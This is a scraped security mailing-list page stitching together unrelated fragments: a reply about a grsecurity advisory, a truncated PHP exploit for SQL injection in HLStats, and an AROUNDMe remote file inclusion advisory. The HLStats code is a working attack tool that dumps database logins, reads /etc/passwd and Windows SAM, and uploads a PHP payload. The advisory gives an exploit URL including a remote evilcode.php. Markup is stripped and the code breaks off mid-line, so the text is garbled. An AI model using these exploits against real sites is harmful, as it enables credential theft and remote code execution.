Math², Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0, Jethro And
everybody from #aerox
Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability
Could you please provide more details about this vulnerability ? Especially which versions are affected :-) Kind regards, Marek Kroemeke
HLStats Remote SQL Injection Exploit
Hlstats is more than 5 years old. HLstats has been downloaded more than
270,000 from http://sf.net. Nothing more than absolutely benign XSS has been
reported for this application, until NOW.
Merry Christmass,
--Michael Brooks
Homepage:
http://sourceforge.net/projects/hlstats/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
brb
?php
/*
Live Exploit Code
SQL Inection + Path Disclosure
Affects HLStats HLStats =1.34 and Hlstats = 1.20
works with magic_quotes_gpc=On
by Michael Brooks
*/
print titleHLStats SQL Injection Exploit/title
body bgcolor='#009900'
font color='#FF'
b/bbrbr
centerb br
Welcome To HLstats Exploit code.brbr
/b/center
br
SQL Inection + Path Disclosurebr
Affects Hlstats = 1.20 to HLStats =1.34(current)br
Tested on Linux and Windowsbr
works with magic_quotes_gpc=On!br
HLStats has gone though 5 years with no exploits so this is a Birthday
Present!br
Merry Christmass!br
By Michael Brooksbr
br
b/bbrbr
;
print
form action='.$_SERVER['PHP_SELF'].' method='post'
bTarget:/bbr
input type='text' name='target' size=32br
(hint: where the login form is. example:
http://domain.com/path/hlstats.php )br
brbProxy:/b(ip:port or name:[EMAIL PROTECTED]:port)br
input type='text' name='proxy' size=32br
(example: 127.0.0.1:8118 Use a href='http://tor.eff.org'Tor/a+a
href='http://www.privoxy.org/'Privoxy/a. )br
brbr
If nothing is changed below this line then the exploit will attempt to
get the database login information in plain text.
b/bbrbr
H1ATTACKS:/H1
br
bDatabase Selects:/bbr
br
OBTIAN HLStats logins:br
input type='submit' name='button' value='HLStats_Logins'(Passwords
are stored as MD5 hashs, use: a
href='http://www.milw0rm.com/cracker/insert.php'Milw0rm's MD5 Cracker/a)br
OBTIAN mysql.user logins:br
input type='submit' name='button' value='Mysql_Logins'br
br
br
bFile IO:/bbrbr
bPath Disclosure/bbr
input type='submit' name='button' value='Path'br
br
bPlain Text Database Login Information/bbr
input type='submit' name='button' value='Read_Login'
(This will attempt to read the configuration file for hlstats and dump
the PLAIN TEXT database login information.)br
br
bRead Other File/bbr
input type='submit' name='button' value='Read_File'
input type='text' name='read_file' size=50
brexample: /etc/passwdbr
OR for windows based systems: C:WINDOWSrepairsambr
brbattempt payload:/b(WARNING, NO PROXY IS USED FOR UPLOADING
PAYLOAD)br
input type='submit' name='button' value='Upload'
lt?php input type='text' name='payload' size=50?gt br
example: system('netstat'); br
/form
brb/bbr
;
//generic http class
class http{
var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='';
function http_gpc_send($loc ,$cookie=, $postdata = ) {
//overload function polymorphism between gets and posts
$url=parse_url($loc);
if(!isset($url['port'])){
$url['port']=80;
}
//$ua=$_SERVER['HTTP_USER_AGENT'];
$ua='GPC/.01';
if($this-proxy_ip!=''$this-proxy_port!=''){
$fp = pfsockopen( $this-proxy_ip, $this-proxy_port,
$errno, $errstr, 120 );
$url['path']=$url['host'].':'.$url['port'].$url['path'];
}else{
$fp = fsockopen( $url['host'], $url['port'], $errno,
$errstr, 120 );
}
if( !$fp ) {
print $errstr ($errno)br\nn;
} else {
if( $postdata=='' ) {
fputs( $fp, GET .$url['path'].?.$url['query'].
HTTP/1.1\r\n );
} else {
fputs( $fp, POST .$url['path'].?.$url['query'].
HTTP/1.1\r\n );
}
if($this-proxy_name!=''$this-proxy_pass!=''){
fputs($fp, Proxy-Authorization: Basic
.base64_encode($this-proxy_name.:.$this-proxy_pass).\r\n\r\n);
}
fputs($fp, Host:
AROUNDMe 0.6.9 remonte file inclusion
==
AROUNDMe 0.6.9 remonte file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)
discovered by: noislet ( http://www.noislet.org/ )
vendor informed: 21.10.2006
published: 22.10.2006
==
product info:
AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.
==
bug details:
Input passed to the $templatePath is not verified before being used
to include files.
required:
register_globals = On
file:
pol_view.tpl.php (and others)
buggy code:
if (isset($poll)) {
...
include $templatePath . poll_detail.inc.tpl.php;
==
example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1templatePath=http://example.com/evilcode.php%00
--
noislet
\ page http://www.noislet.org/
